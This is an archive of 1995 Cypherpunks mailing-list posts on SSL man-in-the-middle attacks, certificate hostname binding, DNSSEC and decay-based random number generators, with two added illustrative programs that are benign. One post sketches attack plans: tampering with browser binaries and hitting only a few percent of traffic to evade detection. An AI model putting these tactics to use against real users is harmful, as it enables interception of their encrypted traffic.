> from NetScape (a good ISP level attack) or after the fact with a virus.
> The client binary would be normally functioning with servers other than the
> attacking MITM filter.

That's not an attack on SSL.   It's an attack on an application.
It's no different, conceptually, than attacking sendmail or MS Word.

The point to attacking SSL is to be able to decode a message from any
browser, without having to do anything extraordinary to the victim's host.
No cryptosystem is proof against an attacker who can see and
control everything you do on the client side (i.e. has root in UNIX
parlance).

So, while your idea #1 might be interesting or fun to do as far as computer
security goes, it's not an attack on SSL. 

> #2  Present client with the filter's valid certificate and hope that in the
> rare case the user looks, that they will not question it, or even know what
> a valid one from the real server is.

That points out the flaw in Netscape's authentication model that
others have already pointed out on this list.  Admittedly, like Don
Stephenson just posted, there's not really a good way to distribute
and authenticate certificates until there's a ubiquitous global
CA chain.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sun, 1 Oct 95 09:50:03 PDT
To: www-security@ns2.rutgers.edu
Subject: MITM attacks, the day after ...
Message-ID: <9510011649.AA12871@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



I suppose C2 got as many "do you know how hard it is" complaints as
I have, or more. But despite that, several people broke keys.

There seem at this point to be two messenger or man in the middle attacks
on SSL that have enough merit to explore further.

#1  Attack client binaries to suppress certificate validation, and accept
ones forged by the filter/MITM. The binary attack could occur during download
from NetScape (a good ISP level attack) or after the fact with a virus.
The client binary would be normally functioning with servers other than the
attacking MITM filter.

#2  Present client with the filter's valid certificate and hope that in the
rare case the user looks, that they will not question it, or even know what
a valid one from the real server is.

Since detection is possible in both of these, attack only a few percent of the
traffic until the heat is on, then lay dormant or move to a different site.

Suggested to me this morning was taking a harder look at proxy servers.

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 1 Oct 95 10:42:01 PDT
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <Pine.SOL.3.91.951001101443.5437A-100000@chivalry>
Message-ID: <199510011756.KAA01707@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> On Sat, 30 Sep 1995, Don Stephenson wrote:
> 
> > I don't think binding hostnames to certificates helps much because 
> > both hostnames and IP addresses can be spoofed and DNS servers can be 
> > subverted.  The important thing is the binding to the "service" name or 
> 
> In this particular case, hostnames do help, because they are information 
> imbedded in the url used to access the server. By verifying the hostname 
> in the certificate with the hostname in the url, you can state with a 
> high degree of confidence that the object retrieved is precisely the 
> desired object covered by this url. 

Assume that the attacker Mallet is in the middle and has control of the http
stream.  Alice clicks on 'open Widget order form' to order a Widget
and Mallet sends her browser a redirect pointing to his evil web server.
Alice doesn't notice that the hostname in the url has changed, or
if she does, she figures that the catalog people have arranged to
have Mallet's server host their 'secure' transactions (not an unreasonable
assumption).  Mallet takes the order and pockets the money.
The hostname in the certificate (Mallet's) matches the hostname
in the URL (also Mallet's).

Of course this isn't really an attack on SSL per se.  It's an attack on
the certificate-granting policy- the CA gave a certificate to
an unscrupulous person (Mallet).

> 
> > Well of course, if the secret key of the server (or worse yet, certificate 
> > authority) is compromised, all bets are off.  That's true of just about any 
> > protocol you can dream up.
> 
> I'm not referring to the secret key of _the_ server; I'm referring to the 
> secret key of _ANY_ server. In the limiting case, such a key can be 
> obtained by buying one from the CA. 

Right. That's what I pointed out in an earlier message, although I
didn't elaborate on it.   The security of Netscape browsers depends
on Verisign's policy in handing out server certificates.


Backing up for a minute, the same problem holds for those neato
credit-card readers that Visa and MasterCharge give out to merchants.
The merchant can be a crook setting up a 'store-front' operation to charge
to bogus/stolen card numbers, or the employees can steal using the numbers
they get in the course of doing business, etc.  There are already
procedures in place for dealing with this sort of crime.  I'm not
sure that tricking Verisign into giving out a certificate to a group
of crackers is really any different than tricking Visa into giving
a card reader to a group of thieves.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 1 Oct 95 12:25:51 PDT
To: cypherpunks@toad.com
Subject: Re: WHERE did this [NOISE] come from?
Message-ID: <199510011925.MAA17193@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 PM 9/30/95 GMT, you wrote:
>Attached to this is, (I hope), the header text from an unsolicited e-mail 
>message I received.  The return address does not work.  WHY? How can I 
>inform the sender that I hope to never receive their material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me 
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it 
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated. 
>Information would be nice too.  

Well, at the bottom of the post, it listed contact info at:

>National Alliance can also be reached at:
>
>WORLD WIDE WEB: http://www.natvan.com (if unavailable, try our ftp site)
>FTP SITE: ftp.netcom.com, path /pub/NA/NA

(I find it funny that they go through the trouble of forging an e-mail
address yet they give ftp and web sites at the end of the page.)

Hopefully that bit of targeting information will be of some use...
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianm@cs.bu.edu (Brian Mancuso)
Date: Sun, 1 Oct 95 10:09:39 PDT
To: cypherpunks@toad.com
Subject: WWW Proxy Server Vulnerabilities
Message-ID: <199510011708.NAA29261@csa.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Regarding WWW SSL middle-man attacks,

John L. Bass writes:
: Ok, several people have asked:
: 
: client ->   filter                          Client sends packet with K(c)
:             filter ->       Server          filter forwards packet with K(f)
:             filter       <- Server          Server sends encrypts with K(f)
: client   <- filter                          filter re-encrypts with K(c)
: 
: hacking a DMS server is one way, spoofing a DNS reply to named is easier,
: simply packaging the filter into a router/bridge close to the server
: is more effective ... even if hacking the incoming phoneline/T1 line
: to the server and inserting a very transparent bridge AKA a phone tap.
: 

Consider the following attack: Many organizations, especially ones with low
bandwidth localnet-to-internet connections and those with firewalls, have
implemented `proxy-servers' to retrieve documents from the outside world
and cache them for fast future localnet access. ALL WEB TRAFFIC FROM THE
LOCALNET TO THE INTERNET GOES THROUGH THESE PROXY SERVERS, transparently
to the client and web servers after the client has been configured to do
so.

If one of these servers were to be compromised, an attacker could easily
implement the middle-man scheme described above. Note that proxy
servers are fairly common (especially since firewalls require them),
so the apparatus already exists for the middle-man attack outside of
modifying DNS servers and routers.

The irony of the situation is that it is the most secure organizations
who have implemented firewalls that are the most vulnerable to the
middle-man attack.

Brian Mancuso

Boston University Computer Science Dept.  PGP DF FA C0 EF 51 B0 23 54
Tel: 617.352.6552 Net: brianm@cs.bu.edu   KFP 5C 8D E0 50 C6 39 C6 0F



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:18:16 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510011820.OAA27233@frankenstein.piermont.com>
Message-ID: <199510011918.NAA22758@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes, regarding alpha decay counts for random numbers:

> And, as I noted, there are RS232 interfaceable radiation detectors you
> can buy off the shelf -- no hardware hacking needed.

As far as a radiation source goes, the Americium 241 source from a cheap
smoke detector is just dandy. A while ago, I took one into the lab and
put it on a scintillating counter and got alpha hits at roughly 
half-microsecond intervals. It was a while ago, so I forget how this compared
to the rating in Curies on the package. But that would be fine for a
low-to-moderate bandwidth RNG.

                                    -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:29:19 PDT
To: cypherpunks@toad.com
Subject: Quantum Crypto: Anecdote
Message-ID: <199510011929.NAA29289@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Given the regularity with which fears of factoring by quantum computers come
up around here, I thought I'd share a brief story:

At a party last night, I ran into a couple of acquaintances, and was 
delighted to learn that they are working on the current NIST quantum computing
project, making quantum gates out of atomic traps similar to those used
by Cornell and Wieman to get a Bose condensate with Rubidium (crypto relevance
comes from odd places, eh?) Anyway, I talked them up a bit, and so far they've
managed to construct a working "or" gate. The long-term project is to construct
a quantum computer capable of factoring 15, which they expect to take at
least several years.

I mentioned crypto and they literally laughed at me. The word from the 
trenches is "don't worry about it for a very long time."

                                   -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sun, 1 Oct 95 12:39:05 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510011918.NAA22758@bogart.Colorado.EDU>
Message-ID: <199510011938.NAA04391@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



I write:

> put it on a scintillating counter and got alpha hits at roughly 
> half-microsecond intervals.
  ^^^^^^^^^^^^^^^^

Um, sorry about that. That's half _millisecond_ intervals. What's three 
orders of magnitude between friends?

As long as I'm correcting myself, I just sent another message with subject
"Quantum Crypto..." which should have been "Quantum Computing..."

Sigh. Sundays.

                                 -- Will
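
An added illustration of the "low-to-moderate bandwidth" estimate in this thread, not code from any of the posters. It assumes one common extraction method (compare two successive inter-hit intervals and emit one bit, discarding ties), a 1 microsecond timer, and it simulates the hits with a seeded PRNG standing in for the detector; only the half-millisecond mean interval comes from the messages above.

```python
import random

MEAN_INTERVAL_S = 0.0005   # half a millisecond between alpha hits (from the thread)
TICK_S = 1e-6              # assumed timer resolution (constructed for this example)


def simulated_intervals(n, seed):
    """Constructed stand-in for the detector: n exponentially distributed
    inter-hit intervals, quantized to whole timer ticks."""
    rng = random.Random(seed)
    rate = 1.0 / MEAN_INTERVAL_S          # about 2000 hits per second
    return [int(rng.expovariate(rate) / TICK_S) for _ in range(n)]


def bits_from_intervals(ticks):
    """One bit per non-overlapping pair of intervals.

    Successive decay intervals are independent and identically distributed,
    so P(a > b) == P(a < b) whatever the source strength. Equal readings
    (possible because the timer is quantized) carry no information and are
    dropped rather than mapped to a fixed bit, which would bias the output.
    """
    bits = []
    for a, b in zip(ticks[0::2], ticks[1::2]):
        if a != b:
            bits.append(1 if a > b else 0)
    return bits


def summarize(n_intervals=20000, seed=1995):
    """Bit count, fraction of ones and throughput for a simulated run."""
    ticks = simulated_intervals(n_intervals, seed)
    bits = bits_from_intervals(ticks)
    elapsed_s = sum(ticks) * TICK_S
    return {
        "bits": len(bits),
        "ones_fraction": sum(bits) / len(bits),
        "bits_per_second": len(bits) / elapsed_s,
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(key, value)
```

Two intervals are consumed per output bit, so a source hitting every half millisecond yields on the order of a thousand bits per second before any further conditioning.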




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William.Soley@Eng.Sun.COM (William Soley)
Date: Sun, 1 Oct 95 13:44:42 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, Oct 1 1995, Simon Spero wrote:

> On Sat, 30 Sep 1995, Don Stephenson wrote:
>
> > I don't think binding hostnames to certificates helps much because 
> > both hostnames and IP addresses can be spoofed and DNS servers can be 
> > subverted.  The important thing is the binding to the "service" name or 
> 
> In this particular case, hostnames do help, because they are information 
> imbedded in the url used to access the server. By verifying the hostname 
> in the certificate with the hostname in the url, you can state with a 
> high degree of confidence that the object retrieved is precisely the 
> desired object covered by this url. 
> 
Hostnames help only a little.  Often the host name belongs to the ISP that
is providing the server resources.  For example when I ordered sushi last
night from WOW, the URL was "https://www.ird.net/[...]wow[...]", but the
certificate was issued to "www.sunnyside.com" (as displayed by the
File->DocumentInformation menu item in Netscape):

Version: 00
Serial Number: 02:72:00:00:3C
Issuer:  C=US, O=RSA Data Security, Inc., OU=Secure Server Certification Authority
Subject: C=US, ST=California, L=Palo Alto, O=Sunnyside Computing, Inc., OU=Internet Services, CN=www.sunnyside.com


PROBLEMS:

(1) The certificate *was* issued with a host name in the CN field, but it
did not match the host name in the URL and my browser did not care to warn
me of this discrepancy (I had to manually request to see the certificate
and check it myself -- not a likely precaution for Joe Sixpack).

(2) Even if the certificate did match the URL (and my browser did check it)
I still have no way to know that "Sunnyside Computing" or "sunnyside.com" or
"ird.net" is actually the authentic/official ISP for WOW and not an imposter
or MITM.

(3) Netscape is making the problem worse (yes, worse) in the next release
by allowing the user to specify their own list of trusted CAs.  (I will
elaborate on this unpopular view below.)


NON-PROBLEMS:

(1) SSL did its job.  It is only a session layer.  It assured the application
that a secure session was established with the entity named in the certificate.

(2) The sushi was very good.  :-)


DISCUSSION:

Re: problem 2, it would be better to have the certificate issued with
the subject ... O=Waiters on Wheels ... CN=www.ird.net ... so that the
browser can automatically check it against the URL and the user can be
assured that (assuming suitable CA policy) ird.net is an
authentic/official ISP for WOW.  I think the browser should check the
CN and hostname in the URL and display a popup warning if they do not
match, and (optionally but by default) display a popup whenever a new
session is started with a different certificate -- and of course show
the certificate.  This is not perfect, of course, it's just better.

Re: problem 3, about how allowing the user to specify their own list of
trusted CAs is bad.  All it takes is for any web page to put up text
like ...  "Dear Joe Sixpack, in order to assure your privacy while
viewing these naughty pictures you must add the following certificate
to your such-and-such file ..." and Joe Sixpack will be happy to do
it.  Even Mary Moderately-Savvy might be tricked into doing it on the
false assumption that it would only affect security for the naughty
pictures site (that she may not care about), and not affect security for
her stock-broker.  This false assumption might be based on the fact
that the (legitimate) stock-broker uses a different CA.

-Bill
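
The two browser checks proposed in the message above (compare the certificate's CN with the hostname in the URL, and flag a session that arrives with a different certificate), as an added example that is not part of the original message and is not Netscape's code. It works on the displayed text form of the certificate quoted above; the function names are constructed, and present-day TLS clients match against subjectAltName entries rather than CN alone.

```python
import re
from urllib.parse import urlsplit

# Certificate fields exactly as displayed in the message above.
ISSUER = "C=US, O=RSA Data Security, Inc., OU=Secure Server Certification Authority"
SERIAL = "02:72:00:00:3C"
SUBJECT = ("C=US, ST=California, L=Palo Alto, O=Sunnyside Computing, Inc., "
           "OU=Internet Services, CN=www.sunnyside.com")

# An attribute starts at the beginning of the string or after a comma,
# and looks like KEY=. A comma not followed by KEY= belongs to the value.
_ATTR_START = re.compile(r"(?:^|,\s*)([A-Za-z]+)=")


def parse_dn(text):
    """Split a displayed distinguished name into (KEY, value) pairs.

    Splitting on every comma would cut "Sunnyside Computing, Inc." in two,
    so values run up to the next KEY= marker instead. This is a parser for
    the display form only; a value that itself contains ", word=" would
    still be ambiguous in that form.
    """
    starts = list(_ATTR_START.finditer(text))
    pairs = []
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(text)
        pairs.append((m.group(1).upper(), text[m.end():end].strip()))
    return pairs


def common_names(dn_text):
    """All CN values, normalized for case-insensitive hostname comparison."""
    return [v.lower().rstrip(".") for k, v in parse_dn(dn_text) if k == "CN"]


def url_host(url):
    """Hostname component of a URL, lower-cased, without a trailing dot."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError("URL has no hostname: %r" % url)
    return host.rstrip(".")


def check_session(url, cert, last_seen):
    """Return the warnings a browser would pop up for this session.

    cert is a dict with "issuer", "serial" and "subject" strings.
    last_seen maps hostname -> (issuer, serial) from the previous session
    and is updated in place.
    """
    host = url_host(url)
    warnings = []

    names = common_names(cert["subject"])
    if host not in names:
        warnings.append("CN mismatch: URL host %s, certificate CN %s"
                        % (host, ", ".join(names) or "(none)"))

    identity = (cert["issuer"], cert["serial"])
    previous = last_seen.get(host)
    if previous is not None and previous != identity:
        warnings.append("certificate changed for %s since last session" % host)
    last_seen[host] = identity
    return warnings


if __name__ == "__main__":
    cert = {"issuer": ISSUER, "serial": SERIAL, "subject": SUBJECT}
    # Host taken from the URL in the message; its path is elided there.
    for line in check_session("https://www.ird.net/", cert, {}):
        print("WARNING:", line)
```

A clean result from both checks still says nothing about problem (2): that the named host really acts for the merchant depends on the CA's issuing policy, not on anything the client can compute.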




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Sun, 1 Oct 95 11:01:44 PDT
To: isig@netf.org
Subject: DNS Security ( was Re: NetScape's dependence upon RSA down...)
Message-ID: <Pine.SUN.3.91.951001135411.12454J-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


DNS security is an important point.  People not aware of efforts in this
area may want to check out draft-ietf-dnssec-secext-05.txt which has
more or less passed working group last call and is being considered by
the Security Area Directory / IESG.  Reference code is also available
(see message pasted at end below).

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)

================================

Date: Mon, 11 Sep 1995 10:24:28 -0400
From: James M Galvin <galvin@TIS.COM>
To: dns-security@TIS.COM
Subject: ANNOUNCEMENT: TIS/DNSSEC Version 1.2 alpha

A new version of TIS/DNSSEC is now available.  This version is
distinguished from the previous version as follows.

        in sync with bind Beta26
        uses RSAREF

For information on how to acquire TIS/DNSSEC retrieve the file
/pub/DNSSEC/README on the host ftp.tis.com via anonymous FTP.

If you have any questions or problems please send a note to
tisdnssec-support@tis.com.

Enjoy,

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 1 Oct 95 14:13:56 PDT
To: cypherpunks@toad.com
Subject: IBM enters WWW security market
Message-ID: <199510012109.OAA00353@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -------- Forwarded message --------
> Newsgroups: comp.os.os2.announce
> Date: Fri, 29 Sep 1995 14:49:59 GMT
> From: tsipple@vnet.IBM.COM
> Subject: OS/2 NEWS:  New, secure version of WebExplorer
> 
> Submitted by:   Timothy F. Sipples (tsipple@vnet.ibm.com)
> Source:         Timothy F. Sipples (tsipple@vnet.ibm.com)
> Date received:  1995 September 26
> Date posted:    1995 September 29
> ------------------------------------------------------------------------------
> New, secure version of WebExplorer for OS/2 Warp
> 
> ATLANTA, Sept. 27, 1995--The latest additions to IBM's Internet
> Connection software family will enable companies to encrypt
> Internet transactions and better protect internal networks with
> firewall software as they explore new business opportunities on
> the Information Superhighway.
> 
> Today's announcements include:
> 
>     * A new secure version of the Web Explorer for OS/2 Warp
> 
>     * The IBM Internet Connection Secure Server for OS/2 Warp
> 
>     * The Internet Connection Secure Server for AIX
> 
>     * An enhanced version of the Internet Connection Secured
>       Network Gateway
> 
>     * an enhanced version of the Internet Connection for OS/2
>       Warp
> 
>     * an enhanced version of the Internet Connection for Windows
> 
> "Businesses of all kinds are considering the immense opportunity
> the Internet offers but are reluctant to take the plunge until
> they feel they can do so in a planned, secure manner.  The
> Internet Connection family provides our customers with that
> reassurance, freeing them to explore a whole new world of
> possibilities," said Lois Dimpfel, vice president, Networking
> Software Products, IBM Networking Software Division.
> 
> The Internet is evolving as a means for conducting electronic
> commerce, and the new IBM secure servers and OS/2 Warp client are
> superbly positioned to meet customer security needs.  The IBM
> Internet Connection servers and client support both of the
> emerging security technologies -- Secure Hypertext Transfer
> Protocol (S-HTTP) and Secure Sockets Layer (SSL) -- to provide
> customers with maximum flexibility.
> 
> New OS/2 Warp client and secure servers
> 
> The new version of the Internet Connection for OS/2 Warp, the
> first Internet client to be included at no charge in an operating
> system, adds security support to an Internet application suite
> that has won generous praise in its first year of availability.
> OS/2 Magazine recently chose the Internet Connection for OS/2
> Warp as a winner in its editors' choice awards.
> 
> The Internet Connection family of client software was also
> enhanced last week.  The Internet Connection for OS/2 Warp,
> provided at no charge as part of the Warp bonus pack, now
> includes table support, streaming graphics, an integrated news
> function and other enhancements through HyperText Markup Language
> (HTML) 3.0 extensions.  These enhancements will also be available
> in the secure version being announced today.
> 
> The Internet Connection for Windows was enhanced with improved
> performance, additional graphic viewers, audio players and other
> features.
> 
> IBM's new web server software provides unmatched scalability for
> customers.  The OS/2 Warp version can run on cost-effective
> desktop systems sold in retail outlets, while the AIX version
> runs on highly-scalable RISC System/6000 platforms.
> 
> Both the IBM Internet Connection Secure Server for OS/2 Warp and
> the Internet Connection Secure Server for AIX were designed to be
> quickly and easily configured using any industry-standard
> browser.  The installation and configuration is menu-based and
> includes online help designed to assist an administrator with
> making the correct choice.
> 
> The new Internet Connection secure servers and clients allow
> businesses and their customers to conduct transactions over the
> 'Net knowing that the data is protected.  For example, an auto
> parts supplier might create a secure web server containing its
> catalog, including high-quality images of the items, on the web
> along with the ability to place an order.  A customer would use
> the Internet Connection secure client -- or an S-HTTP- or
> SSL-compliant client from another vendor -- to browse the
> online catalog, order a part and pay for it with an encrypted
> credit card number.
> 
> Enhanced secured network gateway
> 
> A new version of IBM's Secured Network Gateway, a software
> product generally known as an Internet "firewall," today joins
> the Internet Connection product family.  Formerly part of the
> NetSP product family, the Secured Network Gateway operates on an
> AIX platform to protect a corporation's internal enterprise
> network resources from Internet intruders, while allowing
> legitimate traffic to flow through the firewall.
> 
> The Internet Connection Secured Network Gateway offers a number of
> advanced features, including: proxy server, SOCKS servers, filters and
> domain name service.
> 
> Among several features added to the new version is support for
> AIX version 4.13, in addition to AIX version 3.25.  The new
> operating system support offers customers the option to run the
> Secured Network Gateway on PowerPC hardware.
> 
> Another key feature of the new version is data encryption.  Data
> can safely flow between two firewalls across a public network.
> The firewall encrypts IP data packets, creating a private "IP
> tunnel" from one secure internal network to another.
> 
> The new secure IP tunnels could be used for a company with the
> Secured Network Gateway installed at its various sites to safely
> and confidently transmit sensitive financial data from a branch
> office over the Internet to corporate headquarters.  Customers
> could also use the new feature to securely administer a firewall
> from a remote location.
> 
> Internet Connection directions
> 
> Just as the Internet itself continues to expand phenomenally, the
> Internet Connection family, now consisting of seven generally
> available products, will also grow.  Current product plans call
> for additional web clients on a number of platforms, and web
> server software for OS/400, MVS and selected non-IBM systems.
> 
> "We don't intend to just keep pace with the market; we intend to
> be the pacesetter," said IBM's Dimpfel.  "IBM has worldwide reach
> and strengths like no other company.  The IBM Global Network,
> robust software products, IBM services and gateway software to
> link with existing business systems using DB2 and CICS--all this
> means customers don't have to deal with patching together
> solutions from a collection of vendors."
> 
> The Internet Connection product family is a component of IBM's
> imperative to provide people and organizations with
> network-centric computing, a new model that combines networking
> software, network services and computing devices to facilitate
> computing anywhere, anytime.
> 
> IBM, the world's largest software provider, creates, develops and
> manufactures the industry's most advanced information technologies,
> including networking systems, software, computing systems, storage
> devices and microelectronics.
> 
> Pricing and availability
> 
> The secure server software for OS/2 Warp is $2,999 for the first
> license with additional licenses available for $2,699 each.  The
> AIX secure server software is $4,999 for the first license and
> $4,499 for an additional license.  The Internet Connection Secured
> Network Gateway is priced at $9,999 for the first license, with
> additional licenses available for $8,999.
> 
> The new secure WebExplorer for OS/2 Warp is $35 per copy and
> pricing on the enhanced IBM Internet Connection for Windows has
> been reduced to $59.
> 
> Both secure servers and the secure Web Explorer for OS/2 Warp
> will be generally available in December of this year.  The new
> version of the Secured Network Gateway will be available in
> October.
> 
> 
> IBM, OS/2, AIX, CICS, DB2 and RISC System/6000 are trademarks of IBM.
> 
> Windows is a trademark of Microsoft Corp.
> 


-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 1 Oct 95 11:21:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac92ed4110021004ff54@[205.199.118.202]>
Message-ID: <199510011820.OAA27233@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I'm not making an appeal to authority here, just telling you why I'm
> skeptical of all of these proposals to make a radioactive decay-based
> random number source. There are much easier ways.)

I don't believe the "easier" ways are actually really easier, in so
far as it is very hard to successfully demonstrate that there are no
hidden flaws in most kinds of hardware RNGs -- showing you aren't
picking up nearby RFI and turning it into your RNG output and things
of that sort. A radioactive source is hard to manipulate at a
distance. It will not produce a big volume of random numbers but it
will produce pretty high quality ones. If you have a free running
/dev/rand implementation that saves a lot of them up you should have
enough for most of our purposes.

And, as I noted, there are RS232 interfaceable radiation detectors you
can buy off the shelf -- no hardware hacking needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Sun, 1 Oct 95 13:22:43 PDT
To: "Cancelmoose[tm]" <moose@cm.org>
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <19950930064113.AXK11529@cm.org>
Message-ID: <199510012022.OAA07852@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

"Cancelmoose[tm]" <moose@cm.org> wrote:
>
> I apologize for the delay in responding to your message -- I will be
> putting a lot of information about NoCeM up on http://www.cm.org in
> the next day or so.  You can also find information in the newsgroup
> alt.nocem.misc (if you get it).
> 
> If these don't work for you, feel free to write to me, and I'd be
> happy to send you whatever you need.


I've had a look at the web site and it looks really interesting.  It would
make a great project if a bunch of cypherpunks installed NoCeM and then piped
the list to a newsgroup.  We could then develop reputation servers to help us
use NoCeM, start charging cyberbucks for our recommendations, and, in short,
make cpunks into a slightly larger outpost in Cyberlibertaria.  (a.k.a. The
Free Net)


Bryce

signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMG72U/WZSllhfG25AQEbAAP+Kh8aNRsqfk9TmEtwhbIkhaKGeHh0CyNC
lSQ+vak2IknE2QTxVP01hRGEXfQBZ9JOlxvEQK/ka3SqISmNl1WXo7mGBtk65t+R
42WehIoSuMGJ9maagCK+EPZM+o0PEyqGBA9n4m4GWb1ufM5FiBJISQDIkOQtHy+y
+U07bKuw6lI=
=vxTn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sun, 1 Oct 95 15:32:25 PDT
To: cypherpunks@toad.com
Subject: CJR for perl-RSA t-shirt
Message-ID: <199510012231.PAA00669@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here is a draft of the CJR I intend to file, for the perl-RSA t-shirt.
Please check it over for technical inaccuracies or other problems. It
should sound quite familiar, as I have shamelessly ripped off the CJR
that Phil Karn filed for the Applied Cryptography book.

Let me know what you think!

Raph

=======================================================================
ATTN: Maj Gary Oncale - 15 Day CJ Request
U.S. Department of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Myer Drive
Arlington, VA  22209-3113
Fax +1 703 875 5845

ATTN: 15 Day CJ Request Coordinator
National Security Agency
P.O. Box 246
Annapolis Junction, MD  20701


Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
          Requested

Subject:  Commodity Jurisdiction Request for
          perl-RSA t-shirt, an encryption program

INTRODUCTION

This is a Commodity Jurisdiction Request for mass market software
with encryption capabilities.  
 
The name of the software product is "perl-RSA t-shirt", by
Adam Back. It is published in the form of a t-shirt by Joel Furr, 916
W. Trinity Ave, #10, Durham NC 27701.

I have no DTC registration code.

I have reviewed and determined that this t-shirt, the subject of this CJ
request, meets paragraph 1 of the "Criteria for Determining the
Eligibility of A Mass Market Software Product for Expedited Handling."

I base this determination on the following facts:

a) this t-shirt is readily available from Joel Furr, and has been
shipped in quantity of several hundred copies, thus qualifying it as
mass market software;

b) sufficient documentation is included to allow installation and use
by any end user capable of typing in the software, or scanning the bar
code, and running it. Additional documentation is available on the
Internet World Wide Web at http://dcs.ex.ac.uk/~aba/rsa/ . To my
knowledge the author and publisher provide no "product support" as
that term is generally understood; and

c) the t-shirt contains encryption software source code listings that
provide confidentiality.

A duplicate copy of this CJR has been sent to the 15 Day CJ Request
Coordinator.

DESCRIPTION

The t-shirt contains an implementation of the RSA asymmetric
cryptographic algorithms. Furthermore, instructions, in the form of a
terse usage string, are given for using the implementation to provide
confidentiality. The source code of the implementation is featured
both as four lines of text and also as a bar code, making the t-shirt
machine readable as well as machine washable. The algorithm is
implemented in the Perl scripting language, and will run on any
standard Unix configuration that includes both an implementation of
the Perl language and the common "dc" (desk calculator) program.

Two copies of the shirt are included with the filing of this CJ
request.

ORIGIN OF COMMODITY

This t-shirt originates in the United States. While the primary author
is a citizen of the United Kingdom, living in England, other
contributors to the work are citizens of the US living in the US. The
publisher is a United States citizen living in the United States. The
t-shirts are manufactured and printed in the United States.

The cryptographic algorithm implemented in this t-shirt comes from
various sources, at various times, and was produced with both private
and public sources of funding.

The source code implementation contained in the t-shirt also comes
from a variety of countries, including Australia, Canada, the United
States and the United Kingdom.

The algorithm is thought to be designed for private and commercial
civilian use.

